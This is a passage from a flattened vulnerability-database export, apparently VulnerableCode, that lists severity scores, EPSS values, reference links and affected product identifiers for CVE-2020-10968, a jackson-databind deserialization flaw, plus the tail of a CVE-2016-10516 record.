scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-10516
15
reference_url https://usn.ubuntu.com/3463-1/
reference_id USN-3463-1
reference_type
scores
url https://usn.ubuntu.com/3463-1/
fixed_packages
aliases CVE-2016-10516, GHSA-h2fp-xgx6-xh6f, PYSEC-2017-43
risk_score 3.2
exploitability 0.5
weighted_severity 6.4
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3t8t-yt9b-1fce
9
url VCID-3wa1-khqf-x7fv
vulnerability_id VCID-3wa1-khqf-x7fv
summary 
jackson-databind mishandles the interaction between serialization gadgets and typing
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy).
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10968.json
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-10968.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-10968
reference_id
reference_type
scores
0
value 0.04028
scoring_system epss
scoring_elements 0.88441
published_at 2026-04-02T12:55:00Z
1
value 0.04028
scoring_system epss
scoring_elements 0.88433
published_at 2026-04-01T12:55:00Z
2
value 0.04028
scoring_system epss
scoring_elements 0.88456
published_at 2026-04-04T12:55:00Z
3
value 0.05104
scoring_system epss
scoring_elements 0.89836
published_at 2026-04-13T12:55:00Z
4
value 0.05104
scoring_system epss
scoring_elements 0.89843
published_at 2026-04-12T12:55:00Z
5
value 0.05104
scoring_system epss
scoring_elements 0.89845
published_at 2026-04-11T12:55:00Z
6
value 0.05104
scoring_system epss
scoring_elements 0.89839
published_at 2026-04-09T12:55:00Z
7
value 0.05104
scoring_system epss
scoring_elements 0.89832
published_at 2026-04-08T12:55:00Z
8
value 0.05104
scoring_system epss
scoring_elements 0.89815
published_at 2026-04-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-10968
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10968
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10968
3
reference_url https://github.com/FasterXML/jackson-databind
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind
4
reference_url https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676
5
reference_url https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88
6
reference_url https://github.com/FasterXML/jackson-databind/issues/2662
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:46Z/
url https://github.com/FasterXML/jackson-databind/issues/2662
7
reference_url https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:46Z/
url https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html
8
reference_url https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:46Z/
url https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
9
reference_url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
10
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-10968
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv2
scoring_elements AV:N/AC:M/Au:N/C:P/I:P/A:P
1
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-10968
11
reference_url https://security.netapp.com/advisory/ntap-20200403-0002
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20200403-0002
12
reference_url https://security.netapp.com/advisory/ntap-20200403-0002/
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:46Z/
url https://security.netapp.com/advisory/ntap-20200403-0002/
13
reference_url https://www.oracle.com/security-alerts/cpujan2021.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:46Z/
url https://www.oracle.com/security-alerts/cpujan2021.html
14
reference_url https://www.oracle.com/security-alerts/cpujul2020.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:46Z/
url https://www.oracle.com/security-alerts/cpujul2020.html
15
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:46Z/
url https://www.oracle.com/security-alerts/cpuoct2020.html
16
reference_url https://www.oracle.com/security-alerts/cpuoct2021.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-05-25T04:00:46Z/
url https://www.oracle.com/security-alerts/cpuoct2021.html
17
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1819208
reference_id 1819208
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1819208
18
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
19
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*
reference_id cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*
20
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*
21
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*
22
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*
23
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*
24
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*
25
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*
26
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*
27
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*
28
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*
29
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*
30
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_contacts_server:8.0.0.4.0:*:*:*:*:*:*:*
31
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*
32
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*
33
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*
34
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*
35
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*
36
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*
37
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1:*:*:*:*:*:*:*
38
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*
39
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*
40
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0:*:*:*:*:*:*:*
41
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*
42
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*
43
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.6:*:*:*:*:*:*:*
44
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.0.7:*:*:*:*:*:*:*
45
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*
46
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.6:*:*:*:*:*:*:*
47
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:8.0.7:*:*:*:*:*:*:*
48
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_retail_customer_analytics:8.0.6:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:financial_services_retail_customer_analytics:8.0.6:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:financial_services_retail_customer_analytics:8.0.6:*:*:*:*:*:*:*
49
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*
50
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2.25:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2.25:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2.25:*:*:*:*:*:*:*
51
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0.15:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0.15:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0.15:*:*:*:*:*:*:*
52
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*
53
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
54
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*
55
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*
56
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*
57
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*
58
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*
59
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*
60
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*
61
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*
62
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*
